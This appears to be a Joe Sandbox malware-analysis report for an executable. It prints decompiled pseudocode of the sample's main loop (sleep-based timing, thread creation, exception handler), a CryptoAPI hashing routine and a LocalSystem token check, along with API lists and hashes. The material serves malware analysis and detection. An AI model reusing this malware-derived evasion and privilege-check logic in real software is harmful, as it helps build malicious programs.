Opcode Fuzzy Hash: bce2d2705054481c8eb65c820dec133da36924bce70079a761cef1ed0e5549a4
Instruction Fuzzy Hash: DCC00239824838ABCE123B66FC0484E3F26FB463A130114FBA104620308EA21C21EFD8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ??????.exe PID: 3232 Parent PID: 3188 ??????.exeCOMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	24.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	6

Executed Functions

Function 005D2370, Relevance: 20.1, APIs: 13, Instructions: 554
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E005D2370(intOrPtr _a4) {
				char _v532;
				char _v536;
				char _v1052;
				long _v1056;
				short _v1060;
				struct _SECURITY_ATTRIBUTES* _v1068;
				struct _SECURITY_ATTRIBUTES* _v1072;
				char _v1076;
				void* _v1080;
				intOrPtr _v1084;
				void* _v1088;
				char _v1092;
				intOrPtr _v1096;
				void* _v1100;
				signed int _v1104;
				signed int _v1108;
				void* _v1112;
				signed int _v1116;
				signed int _v1120;
				long _t79;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				void* _t101;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				intOrPtr _t109;
				intOrPtr _t113;
				void* _t114;
				signed int _t119;
				signed int _t124;
				char* _t126;
				signed int _t130;
				void* _t132;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t145;
				signed int _t146;
				char* _t149;
				signed int _t158;
				intOrPtr _t159;
				long _t161;
				signed int _t165;
				signed int _t171;
				void* _t174;
				signed int _t179;
				void* _t180;
				void** _t183;
				intOrPtr _t187;
				void* _t188;
				signed int _t194;
				long _t195;
				signed int _t198;
				void* _t199;
				char* _t201;
				void* _t202;
				void* _t206;
				signed int _t207;
				void* _t208;
				void* _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t226;
				intOrPtr _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t230;
				intOrPtr _t231;
				signed int _t237;
				signed int _t239;
				signed int _t248;
				void* _t249;
				intOrPtr* _t250;
				void* _t251;
				void* _t252;
				intOrPtr _t254;
				void* _t255;
				signed int _t257;
				signed int _t264;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t273;
				void* _t275;
				void* _t278;
				intOrPtr _t287;
				void* _t294;

				_t266 = (_t264 & 0xfffffff8) - 0x450;
				_t203 =  &_v1092;
				E005C61D0( &_v1092);
				_t199 = 0x18721;
				_v1060 = 0;
				_v1076 = 0;
				_v1068 = 0;
				_v1072 = 0;
				do {
					SetLastError(0);
					GetModuleHandleW(0);
					_t79 = GetLastError();
					asm("adc dword [esp+0x34], 0x0");
					_t199 = _t199 - 1;
					_v1072 = _t79 + _v1072;
				} while (_t199 > 1);
				_t282 =  *0x5d9ab8;
				_v1116 = 0;
				_v1088 = 0;
				 *0x5d9ae0 =  &_v1092;
				if( *0x5d9ab8 != 0) {
					L9:
					_t82 =  *0x5d9ba0; // 0x0
					if(_t82 == 0) {
						L12:
						_t291 =  *0x5d9ab4;
						if( *0x5d9ab4 == 0) {
							_t180 = E005C5140(0x28);
							E005D43C0(_t180, _t237, _t291);
							 *0x5d9ab4 = _t180;
							E005CAB10();
							_t183 = E005C5140(0x1c);
							_t266 = _t266 + 8;
							_t203 = _t183;
							E005C31D0(_t183);
							 *0x5d9ac8 = _t183;
						}
						 *0x5d9ad0 = 0;
						_t247 = E005C61E0(1, 0);
						_t200 = E005C3180(_t85 + 0x100, 0);
						E005C61E0(1, _t87);
						_push(_t85);
						_push(_t87);
						_t82 = E005C9EE0(_t203);
						_t268 = _t266 + 0x10;
						if(_t82 == 0) {
							L107:
							E005D1FE0(_t82); // executed
							L005D30B0(); // executed
							ExitProcess("true");
						} else {
							E005D6610(_t200, 0, _t247);
							E005C91E0(_t200);
							_t270 = _t268 + 0x10;
							_t248 = 8;
							while(1) {
								_push( *0x5d9ab4);
								_push( *0x5d9aa0);
								E005CC7C0();
								_t82 = E005D7770(_t237,  *0x5d9ab4, 0x5d9ac8);
								_t270 = _t270 + 0x10;
								if(_t82 != 0) {
									break;
								}
								Sleep(0x2710);
								_t18 = _t248 - 1; // 0x7
								_t179 = _t18;
								_t294 = _t248 + 1 - 1;
								_t248 = _t179;
								if(_t294 > 0) {
									continue;
								} else {
									_t82 = _t179 + 1;
									_t248 = _t179 + 1;
									break;
								}
							}
							if(_t248 == 0) {
								goto L107;
							} else {
								_t95 =  *0x5d9ac8; // 0x0
								E005D6750( *((intOrPtr*)(_t95 + 8)));
								_t297 = _v1120;
								if(_v1120 == 0) {
									_t231 =  *0x5d9a94; // 0x0
									E005D4980(_t231, _t297);
									CreateThread(0, 0, E005D3F50,  *0x5d9ab4, 0,  &_v1056);
								}
								_t201 =  &_v532;
								_v1104 = 0;
								_v1108 = 0;
								while(1) {
									_t97 =  *0x5d9ac8; // 0x0
									 *0x5d9b7c = 0;
									_t98 = E005CC430( *((intOrPtr*)(_t97 + 0xc)));
									_t299 = _t98;
									if(_t98 == 0) {
										goto L96;
									} else {
										_v1112 = 0;
										goto L86;
									}
									do {
										L86:
										_t109 =  *0x5d9ac8; // 0x0
										_t250 = E005C42F0( *((intOrPtr*)(_t109 + 0xc)),  *0x5d9b7c);
										_t212 =  *0x5d9ab4; // 0x0
										if(E005D6BD0(_t212, _t299,  *_t250,  *(_t110 + 4) & 0x0000ffff) == 0) {
											L89:
											_push(0x1f4);
											L93:
											Sleep();
											goto L94;
										}
										_v1120 = E005D4E70();
										_t301 = _v1120 -  *(_t250 + 8) - 0x3841;
										if(_v1120 -  *(_t250 + 8) < 0x3841) {
											L91:
											_t119 = E005C3C40( *0x5d9ab4,  &_v1076);
											_t270 = _t270 + 8;
											__eflags = _t119;
											if(_t119 == 0) {
												__eflags = _v1116;
												_t214 =  *0x5d9a94; // 0x0
												 *((intOrPtr*)(_t214 + 0xc)) = _v1076;
												if(__eflags != 0) {
													E005C2230(__eflags,  *0x5d9ab4);
													_t270 = _t270 + 4;
												}
												E005D1960(__eflags,  *0x5d9ab4);
												_t272 = _t270 + 4;
												__eflags =  *0x5d9c54;
												if(__eflags == 0) {
													_t171 = E005C9200(__eflags,  *0x5d9ab4);
													_t272 = _t272 + 4;
													__eflags = _t171;
													if(_t171 != 0) {
														 *0x5d9c54 =  *0x5d9c54 + 1;
														__eflags =  *0x5d9c54;
													}
												}
												_v1084 = _t250;
												__eflags = _v1120 - _v1108 - 0xe11;
												if(_v1120 - _v1108 < 0xe11) {
													L41:
													_t124 = E005C5370();
													__eflags = _t124;
													if(_t124 < 0) {
														E005D4520(_t201, 0x46);
														_t273 = _t272 + 8;
														_push(0x48);
													} else {
														E005D4520(_t201, 0x46);
														_t273 = _t272 + 8;
														__eflags = _t124;
														if(_t124 == 0) {
															_push(0x47);
														} else {
															_push(0x49);
														}
													}
													_t126 =  &_v1052;
													_push(_t126);
													E005D4520();
													_push(_t126);
													E005D4610( *0x5d9ab4, 0xe, _t201);
													_t270 = _t273 + 0x18;
													_t254 = _v1084;
													_v1112 = _v1112 + 1;
													_t202 = 0;
													__eflags = 0;
													do {
														_v1120 = E005D4E70();
														__eflags =  *0x5d9abc;
														if( *0x5d9abc == 0) {
															_t161 = GetTickCount();
															__eflags = _t161 - _v1088;
															if(_t161 > _v1088) {
																_push(0);
																_push( *0x5d9ab4);
																_push( *0x5d9ac8);
																E005D3B90(_t237);
																_t270 = _t270 + 0xc;
																 *0x5d9abc = _v1120;
															}
														}
														_t130 =  *0x5d9b9c; // 0x0
														__eflags =  *_t130 - 2;
														if( *_t130 == 2) {
															L52:
															_push( &_v1092);
															_push( *0x5d9ab4);
															_t132 = E005C7C50();
															_t270 = _t270 + 8;
															_t237 =  *0x5d9b9c; // 0x0
															__eflags = _t132 - 1;
															 *((intOrPtr*)(_t237 + 0x10)) = _v1120 + 0xfffff8f8;
															if(_t132 == 1) {
																 *0x5d9b14 = 1;
															}
															goto L54;
														} else {
															__eflags = _v1120 -  *((intOrPtr*)(_t130 + 0x10)) - 0x1519;
															if(_v1120 -  *((intOrPtr*)(_t130 + 0x10)) < 0x1519) {
																L54:
																__eflags = _v1120 -  *0x5d9bec - 0x4b1;
																if(_v1120 -  *0x5d9bec < 0x4b1) {
																	L57:
																	__eflags = _v1120 -  *0x5d9ac4 - 0x7081;
																	if(_v1120 -  *0x5d9ac4 >= 0x7081) {
																		_t145 = E005CA170();
																		_t257 = _t145;
																		_push(_t145);
																		_t146 = E005C7A60();
																		E005D4520( &_v536, 0x4a);
																		_t275 = _t270 + 8;
																		__eflags = _t146;
																		if(_t146 == 0) {
																			_push(0x4b);
																		} else {
																			_push(0x4c);
																		}
																		_t149 =  &_v1052;
																		_push(_t149);
																		E005D4520();
																		_push(_t149);
																		E005D4610( *0x5d9ab4, 0xe,  &_v532);
																		_t270 = _t275 + 0x18;
																		__eflags = _t257;
																		if(_t257 != 0) {
																			E005C91E0(_t257);
																			_t270 = _t270 + 4;
																		}
																		 *0x5d9ac4 = E005D4E70();
																	}
																	_t218 =  *0x5d9a94; // 0x0
																	_t82 = E005D0300(_t218, _t237);
																	__eflags = _t82;
																	if(_t82 == 0) {
																		goto L94;
																	} else {
																		__eflags =  *0x5d9abc;
																		if( *0x5d9abc == 0) {
																			L71:
																			__eflags =  *0x5d9b14;
																			if( *0x5d9b14 != 0) {
																				goto L107;
																			}
																			__eflags =  *0x5d9ad0;
																			if( *0x5d9ad0 != 0) {
																				 *0x5d9ad0 = 0;
																				_v1104 = 5;
																			}
																			_t239 = _v1104;
																			__eflags = _t239;
																			_t138 = 0 | __eflags <= 0x00000000;
																			_t237 = _t239 - (0 | __eflags > 0x00000000);
																			__eflags = _t237;
																			_t55 = _t138 * 8; // 0x1
																			_t255 = _t138 + _t55 + 1;
																			_v1104 = _t237;
																			while(1) {
																				Sleep(0x4e20);
																				__eflags = _t255 - 2;
																				if(_t255 < 2) {
																					goto L77;
																				}
																				_t139 =  *0x5d9ad0; // 0x0
																				_t255 = _t255 - 1;
																				__eflags = _t139;
																				if(_t139 == 0) {
																					continue;
																				}
																				goto L77;
																			}
																			goto L77;
																		}
																		_push(1);
																		_push( *0x5d9ab4);
																		_t140 = E005D4610();
																		_t270 = _t270 + 8;
																		__eflags = _t140;
																		if(_t140 == 0) {
																			goto L94;
																		}
																		_t141 = E005CA180( *0x5d9ab4);
																		_t270 = _t270 + 4;
																		__eflags = _t141;
																		if(_t141 == 0) {
																			_t82 =  *0x5d9b14; // 0x0
																			_t226 = 0xf;
																			__eflags = _t82;
																			if(_t82 != 0) {
																				_t226 = 4;
																			}
																			__eflags = _t226 - 0xc;
																			if(_t226 == 0xc) {
																				goto L94;
																			} else {
																				__eflags = _t226 - 0xf;
																				if(_t226 == 0xf) {
																					goto L94;
																				}
																				__eflags = _t82;
																				if(_t82 == 0) {
																					goto L94;
																				}
																				goto L107;
																			}
																		}
																		_t227 =  *0x5d9a94; // 0x0
																		__eflags = E005D2F10(_t227);
																		if(__eflags != 0) {
																			_t229 =  *0x5d9a94; // 0x0
																			E005D73C0(_t229, _t142);
																			E005C91E0(_t142);
																			_t270 = _t270 + 4;
																		}
																		_t228 =  *0x5d9a94; // 0x0
																		_t82 = E005C77E0(_t228, __eflags);
																		goto L71;
																	}
																}
																__eflags = _v1120 -  *((intOrPtr*)(_t254 + 0xc)) - 0x3841;
																if(_v1120 -  *((intOrPtr*)(_t254 + 0xc)) < 0x3841) {
																	goto L57;
																}
																 *0x5d9bec = _v1120;
																_t158 = E005C9060( *0x5d9ab4, 0x5d9ac8);
																_t270 = _t270 + 8;
																__eflags = _t158;
																if(_t158 != 0) {
																	_t159 =  *0x5d9ac8; // 0x0
																	E005D6750( *((intOrPtr*)(_t159 + 8)));
																	 *0x5d9b7c = 0;
																	goto L94;
																}
																goto L57;
															}
															goto L52;
														}
														L77:
														_t254 = _v1084;
														_t202 = _t202 + 1;
														__eflags = _t202 - 0x64;
													} while (_t202 < 0x64);
													goto L94;
												} else {
													_t165 =  *0x5d9bf8; // 0x3
													__eflags = _t165;
													if(_t165 <= 0) {
														E005C2DA0();
														_t165 =  *0x5d9bf8; // 0x3
													}
													__eflags = _v1108;
													if(_v1108 != 0) {
														__eflags = _t165;
														if(_t165 > 0) {
															_t230 =  *0x5d9c40; // 0x27ab78
															__eflags = _t230;
															if(_t230 != 0) {
																_push(_t230);
																E005C3200();
																_t272 = _t272 + 4;
																_t165 =  *0x5d9bf8; // 0x3
															}
														}
													}
													__eflags = _t165;
													if(_t165 < 0) {
														L39:
														E005C80F0( *0x5d9ab4);
														_t272 = _t272 + 4;
														goto L40;
													} else {
														__eflags = (_t165 | 0x00000001) - 3;
														if((_t165 | 0x00000001) != 3) {
															L40:
															_v1108 = _v1120;
															goto L41;
														}
														goto L39;
													}
												}
											}
											_push(0x3e8);
											goto L93;
										}
										_t174 = E005C5960(_t301,  *0x5d9ab4,  &_v1060);
										_t270 = _t270 + 8;
										if(_t174 == 0) {
											 *(_t250 + 8) = _v1120;
											goto L91;
										}
										goto L89;
										L94:
										_t251 =  *0x5d9b7c; // 0x0
										_t113 =  *0x5d9ac8; // 0x0
										_t252 = _t251 + 1;
										 *0x5d9b7c = _t252;
										_t114 = E005CC430( *((intOrPtr*)(_t113 + 0xc)));
										_t201 =  &_v532;
									} while (_t252 < _t114);
									L97:
									_t206 =  *0x5d9ab4; // 0x0
									_v1100 = 0;
									_t249 = E005C1B50(_t206,  &_v1100);
									_push( *0x5d9ab4);
									_push( *0x5d9aa0);
									_t101 = E005CC7C0();
									_t270 = _t270 + 8;
									_t207 = 1;
									if(_t101 == 0) {
										L103:
										if(_v1112 == 0) {
											_t311 = _t207;
											if(_t207 != 0) {
												_push( *0x5d9ab4);
												E005CAB60(_t311);
												_t270 = _t270 + 4;
											}
										}
										continue;
									}
									_t208 =  *0x5d9ab4; // 0x0
									_v1080 = 0;
									_t104 = E005C1B50(_t208,  &_v1080);
									_t207 = 1;
									if(_t104 == 0) {
										goto L103;
									}
									_t209 = _v1100;
									if(_v1100 != _v1080) {
										L101:
										_t105 = E005D7770(_t237,  *0x5d9ab4, 0x5d9ac8);
										_t270 = _t270 + 8;
										_t207 = 1;
										if(_t105 == 3) {
											_t106 =  *0x5d9ac8; // 0x0
											E005D6750( *((intOrPtr*)(_t106 + 8)));
											_t207 = 0;
										}
										goto L103;
									}
									_t108 = E005D7D20(_t249, _t104, _t209);
									_t270 = _t270 + 0xc;
									_t207 = 1;
									if(_t108 != 0) {
										goto L103;
									}
									goto L101;
									L96:
									_v1112 = 0;
									goto L97;
								}
							}
						}
					}
					if(_t82 > 2) {
						goto L107;
					} else {
						_v1116 = 1;
						goto L12;
					}
				}
				_t187 =  *0x5d9cf4(0, E005C58F0); // executed
				_t203 =  &_v1100;
				 *0x5d9ab8 = _t187;
				 *0x5d9bf0 = 1;
				_t188 = E005C7340( &_v1100);
				 *0x5d9ae8 = E005C3A80();
				_v1060 = 0;
				_push(0x5d9c40);
				_push(0x5d9aa0);
				_push(_a4);
				E005C3EC0(_t237, _t282);
				_t278 = _t266 + 0xc;
				SetCurrentDirectoryW( *0x5d9aa0); // executed
				if(_t188 != 0) {
					_t82 = E005C18E0(_t237, __eflags,  *0x5d9aa0);
					goto L107;
				}
				 *0x5d9ab4 = 0;
				E005D2D90();
				if(E005C2DA0() == 0) {
					L7:
					_t194 = E005C3180(0x1c, 0);
					_t266 = _t278 + 8;
					 *0x5d9b9c = _t194;
					 *((intOrPtr*)(_t194 + 0x10)) = 0;
					_t195 = GetTickCount();
					_t287 =  *0x5d9c04; // 0x0
					 *0x5d9ac4 = 0;
					 *0x5d9bec = 0;
					 *0x5d9c54 = 0;
					_v1096 = _t195 + 0x1d4c0;
					if(_t287 == 0) {
						 *0x5d9c04 = E005D1690();
					}
					goto L9;
				}
				_t198 =  *0x5d9c40; // 0x27ab78
				if(_t198 == 0) {
					goto L7;
				}
				_push(_t198); // executed
				_t82 = E005C3200(); // executed
				_t278 = _t278 + 4;
				if(_t82 == 0) {
					goto L107;
				}
				goto L7;
			}

0x005d2379
0x005d237f
0x005d2383
0x005d2390
0x005d2395
0x005d2399
0x005d239d
0x005d23a1
0x005d23a5
0x005d23a6
0x005d23ad
0x005d23b3
0x005d23b9
0x005d23be
0x005d23bf
0x005d23c3
0x005d23c8
0x005d23d3
0x005d23db
0x005d23e3
0x005d23e8
0x005d24c9
0x005d24c9
0x005d24d0
0x005d24e2
0x005d24e2
0x005d24e9
0x005d24ed
0x005d24f9
0x005d2504
0x005d250a
0x005d2511
0x005d2516
0x005d2519
0x005d251d
0x005d2522
0x005d2522
0x005d252c
0x005d253a
0x005d254c
0x005d2553
0x005d2558
0x005d2559
0x005d255a
0x005d255f
0x005d2564
0x005d2b8a
0x005d2b8a
0x005d2b8f
0x005d2b96
0x005d256a
0x005d256e
0x005d2577
0x005d257c
0x005d2585
0x005d258a
0x005d258a
0x005d2590
0x005d2596
0x005d25a9
0x005d25ae
0x005d25b3
0x00000000
0x00000000
0x005d25ba
0x005d25bc
0x005d25bc
0x005d25c3
0x005d25c5
0x005d25c7
0x00000000
0x005d25c9
0x005d25c9
0x005d25ca
0x00000000
0x005d25ca
0x005d25c7
0x005d25ce
0x00000000
0x005d25d4
0x005d25d4
0x005d25e2
0x005d25e7
0x005d25ec
0x005d25ee
0x005d25f4
0x005d260e
0x005d260e
0x005d2614
0x005d261b
0x005d2623
0x005d262b
0x005d262b
0x005d2630
0x005d263d
0x005d2642
0x005d2644
0x00000000
0x005d264a
0x005d264a
0x005d2652
0x005d2652
0x005d29f5
0x005d29f5
0x005d29f5
0x005d2a08
0x005d2a0e
0x005d2a1e
0x005d2a4c
0x005d2a4c
0x005d2a79
0x005d2a79
0x00000000
0x005d2a79
0x005d2a25
0x005d2a2e
0x005d2a33
0x005d2a59
0x005d2a64
0x005d2a69
0x005d2a6c
0x005d2a6e
0x005d2657
0x005d2660
0x005d2666
0x005d2669
0x005d2671
0x005d2676
0x005d2676
0x005d267f
0x005d2684
0x005d2687
0x005d268e
0x005d2696
0x005d269b
0x005d269e
0x005d26a0
0x005d26a2
0x005d26a2
0x005d26a2
0x005d26a0
0x005d26ab
0x005d26b3
0x005d26b8
0x005d2711
0x005d2715
0x005d271a
0x005d271c
0x005d2736
0x005d273b
0x005d273e
0x005d271e
0x005d2723
0x005d2728
0x005d272b
0x005d272d
0x005d2742
0x005d272f
0x005d272f
0x005d272f
0x005d272d
0x005d2744
0x005d274a
0x005d274b
0x005d2753
0x005d275d
0x005d2762
0x005d2765
0x005d2769
0x005d276d
0x005d276d
0x005d276f
0x005d2774
0x005d2777
0x005d277e
0x005d2780
0x005d2786
0x005d278a
0x005d278c
0x005d278e
0x005d2794
0x005d279a
0x005d279f
0x005d27a5
0x005d27a5
0x005d278a
0x005d27aa
0x005d27af
0x005d27b2
0x005d27c2
0x005d27c6
0x005d27c7
0x005d27cd
0x005d27d2
0x005d27df
0x005d27e5
0x005d27e8
0x005d27eb
0x005d27ed
0x005d27ed
0x00000000
0x005d27b4
0x005d27ba
0x005d27c0
0x005d27f7
0x005d2800
0x005d2805
0x005d2837
0x005d2840
0x005d2845
0x005d284d
0x005d2852
0x005d2858
0x005d2859
0x005d286a
0x005d286f
0x005d2872
0x005d2874
0x005d287a
0x005d2876
0x005d2876
0x005d2876
0x005d287c
0x005d2882
0x005d2883
0x005d288b
0x005d289c
0x005d28a1
0x005d28aa
0x005d28ac
0x005d28af
0x005d28b4
0x005d28b4
0x005d28bc
0x005d28bc
0x005d28c1
0x005d28c7
0x005d28cc
0x005d28ce
0x00000000
0x005d28d4
0x005d28d4
0x005d28db
0x005d293c
0x005d293c
0x005d2943
0x00000000
0x00000000
0x005d2949
0x005d2950
0x005d2952
0x005d295c
0x005d295c
0x005d2964
0x005d296c
0x005d296e
0x005d2974
0x005d2974
0x005d2976
0x005d2976
0x005d297a
0x005d297e
0x005d2983
0x005d2985
0x005d2988
0x00000000
0x00000000
0x005d298a
0x005d298f
0x005d2990
0x005d2992
0x00000000
0x00000000
0x00000000
0x005d2992
0x00000000
0x005d297e
0x005d28dd
0x005d28df
0x005d28e5
0x005d28ea
0x005d28ed
0x005d28ef
0x00000000
0x00000000
0x005d28fb
0x005d2900
0x005d2903
0x005d2905
0x005d29a7
0x005d29ac
0x005d29ae
0x005d29b0
0x005d29b2
0x005d29b2
0x005d29b4
0x005d29b7
0x00000000
0x005d29bd
0x005d29bd
0x005d29c0
0x00000000
0x00000000
0x005d29c6
0x005d29c8
0x00000000
0x00000000
0x00000000
0x005d29ce
0x005d29b7
0x005d290b
0x005d2916
0x005d2918
0x005d291a
0x005d2923
0x005d2929
0x005d292e
0x005d292e
0x005d2931
0x005d2937
0x00000000
0x005d2937
0x005d28ce
0x005d280d
0x005d2812
0x00000000
0x00000000
0x005d2817
0x005d2827
0x005d282c
0x005d282f
0x005d2831
0x005d29d3
0x005d29e1
0x005d29e6
0x00000000
0x005d29e6
0x00000000
0x005d2831
0x00000000
0x005d27c0
0x005d2994
0x005d2994
0x005d2998
0x005d2999
0x005d2999
0x00000000
0x005d26ba
0x005d26ba
0x005d26bf
0x005d26c1
0x005d26c3
0x005d26c8
0x005d26c8
0x005d26cd
0x005d26d2
0x005d26d4
0x005d26d6
0x005d26d8
0x005d26de
0x005d26e0
0x005d26e2
0x005d26e3
0x005d26e8
0x005d26eb
0x005d26eb
0x005d26e0
0x005d26d6
0x005d26f0
0x005d26f2
0x005d26fc
0x005d2702
0x005d2707
0x00000000
0x005d26f4
0x005d26f7
0x005d26fa
0x005d270a
0x005d270d
0x00000000
0x005d270d
0x00000000
0x005d26fa
0x005d26f2
0x005d26b8
0x005d2a74
0x00000000
0x005d2a74
0x005d2a40
0x005d2a45
0x005d2a4a
0x005d2a56
0x00000000
0x005d2a56
0x00000000
0x005d2a7b
0x005d2a7b
0x005d2a81
0x005d2a86
0x005d2a87
0x005d2a90
0x005d2a97
0x005d2a97
0x005d2aae
0x005d2aae
0x005d2ab8
0x005d2ac6
0x005d2ac8
0x005d2ace
0x005d2ad4
0x005d2ad9
0x005d2ade
0x005d2ae3
0x005d2b56
0x005d2b5b
0x005d2b61
0x005d2b63
0x005d2b69
0x005d2b6f
0x005d2b74
0x005d2b74
0x005d2b63
0x00000000
0x005d2b5b
0x005d2ae5
0x005d2aef
0x005d2af8
0x005d2aff
0x005d2b04
0x00000000
0x00000000
0x005d2b06
0x005d2b0e
0x005d2b24
0x005d2b2f
0x005d2b34
0x005d2b3a
0x005d2b3f
0x005d2b47
0x005d2b4f
0x005d2b54
0x005d2b54
0x00000000
0x005d2b3f
0x005d2b13
0x005d2b18
0x005d2b1d
0x005d2b22
0x00000000
0x00000000
0x00000000
0x005d2aa6
0x005d2aa6
0x00000000
0x005d2aa6
0x005d262b
0x005d25ce
0x005d2564
0x005d24d5
0x00000000
0x005d24db
0x005d24de
0x00000000
0x005d24de
0x005d24d5
0x005d23f5
0x005d23fb
0x005d23ff
0x005d2404
0x005d240e
0x005d241a
0x005d241f
0x005d2426
0x005d242b
0x005d2430
0x005d2433
0x005d2438
0x005d2441
0x005d2449
0x005d2b82
0x00000000
0x005d2b87
0x005d244f
0x005d2459
0x005d2465
0x005d2481
0x005d2486
0x005d248b
0x005d248e
0x005d2493
0x005d2496
0x005d24a1
0x005d24a7
0x005d24ad
0x005d24b3
0x005d24b9
0x005d24bd
0x005d24c4
0x005d24c4
0x00000000
0x005d24bd
0x005d2467
0x005d246e
0x00000000
0x00000000
0x005d2470
0x005d2471
0x005d2476
0x005d247b
0x00000000
0x00000000
0x00000000

APIs

SetLastError.KERNEL32(00000000), ref: 005D23A6
GetModuleHandleW.KERNEL32(00000000), ref: 005D23AD
GetLastError.KERNEL32 ref: 005D23B3
RtlAddVectoredExceptionHandler.NTDLL(00000000,005C58F0), ref: 005D23F5
SetCurrentDirectoryW.KERNELBASE ref: 005D2441
GetTickCount.KERNEL32 ref: 005D2496
Sleep.KERNEL32(00002710,?,?,?,?,?,?,?,?,00000001,00000000), ref: 005D25BA
CreateThread.KERNEL32(00000000,00000000,005D3F50,00000000,?), ref: 005D260E
GetTickCount.KERNEL32 ref: 005D2780
Sleep.KERNEL32(00004E20), ref: 005D2983
Sleep.KERNEL32(000001F4,00000000,?), ref: 005D2A79
CoUninitialize.OLE32 ref: 005D2B8F
ExitProcess.KERNEL32 ref: 005D2B96

Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Sleep$CountErrorLastTick$CreateCurrentDirectoryExceptionExitFreeHandleHandlerHeapModuleProcessThreadUninitializeVectored
String ID:
API String ID: 1891522815-0
Opcode ID: 024b12438f38467577f177f168d0f94333162a11ceff679776b5004c8ea7d0e0
Instruction ID: 8b7a2148c8e78589a709b88f0f1b8ae0b1c94dd1b49653fd9e0c0035186e3a5d
Opcode Fuzzy Hash: 024b12438f38467577f177f168d0f94333162a11ceff679776b5004c8ea7d0e0
Instruction Fuzzy Hash: A1128F759052029FEB30EF68EC49B1A7FE5FBA4309F04442BE845973A1EB71D848DB52

Uniqueness

Uniqueness Score: -1.00%

Function 005CF800, Relevance: 10.6, APIs: 7, Instructions: 96
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000020,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 005CF824
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 005CF841
CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 005CF859
CryptGetHashParam.ADVAPI32(00000004,00000004,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 005CF87B

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

CryptGetHashParam.ADVAPI32(00000002,00000002,00000000,?,00000000,?,?,?,?,?,0000800C), ref: 005CF8A3
CryptDestroyHash.ADVAPI32(00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?,00000002), ref: 005CF8CB
CryptReleaseContext.ADVAPI32(?,00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?), ref: 005CF8E4

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Crypt$Hash$ContextHeapParam$AcquireAllocateCreateDataDestroyProcessRelease
String ID:
API String ID: 3570522263-0
Opcode ID: 6f562859804f95d0678a3eee0f3031f4be32ccb8c1f35c27981259cd6276be1c
Instruction ID: fa0f8dca470dbaf065fe90b3bb52eae8812e6fec6e74cbe6cb13e55c5b70cff2
Opcode Fuzzy Hash: 6f562859804f95d0678a3eee0f3031f4be32ccb8c1f35c27981259cd6276be1c
Instruction Fuzzy Hash: F2314871205311AFE7219F62DC09F2B7FA9FF84B50F00482EB948D22A0D770D805EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 005C3A80, Relevance: 10.6, APIs: 7, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E005C3A80() {
				void _v84;
				long _v88;
				short _v92;
				void* _v96;
				struct _SID_IDENTIFIER_AUTHORITY _v100;
				void* _t12;
				void* _t15;
				void* _t16;
				int _t21;
				HANDLE* _t27;
				int _t28;
				PSID* _t29;

				_t29 =  &_v96;
				_t28 = 0;
				_t27 =  &_v100;
				 *_t27 = 0;
				_v88 = 0;
				 *_t29 = 0;
				_v92 =  *0x5d9a90 & 0x0000ffff;
				_t12 =  *0x5d9a8c; // 0x0
				_v96 = _t12;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t27) != 0) {
					_t21 = GetTokenInformation(_v100.Value, 1,  &_v84, 0x4c,  &_v88); // executed
					if(_t21 != 0) {
						_t28 = 0;
						if(AllocateAndInitializeSid( &_v100, 1, 0x12, 0, 0, 0, 0, 0, 0, 0, _t29) != 0) {
							_t28 = EqualSid(_v88,  *_t29);
						}
					}
				}
				_t15 =  *_t29;
				if(_t15 != 0) {
					FreeSid(_t15);
				}
				_t16 = _v100;
				if(_t16 != 0) {
					CloseHandle(_t16); // executed
				}
				return _t28;
			}

0x005c3a82
0x005c3a8c
0x005c3a8e
0x005c3a92
0x005c3a94
0x005c3a98
0x005c3a9b
0x005c3aa0
0x005c3aa5
0x005c3abb
0x005c3acf
0x005c3ad7
0x005c3adb
0x005c3af6
0x005c3b05
0x005c3b05
0x005c3af6
0x005c3ad7
0x005c3b07
0x005c3b0c
0x005c3b0f
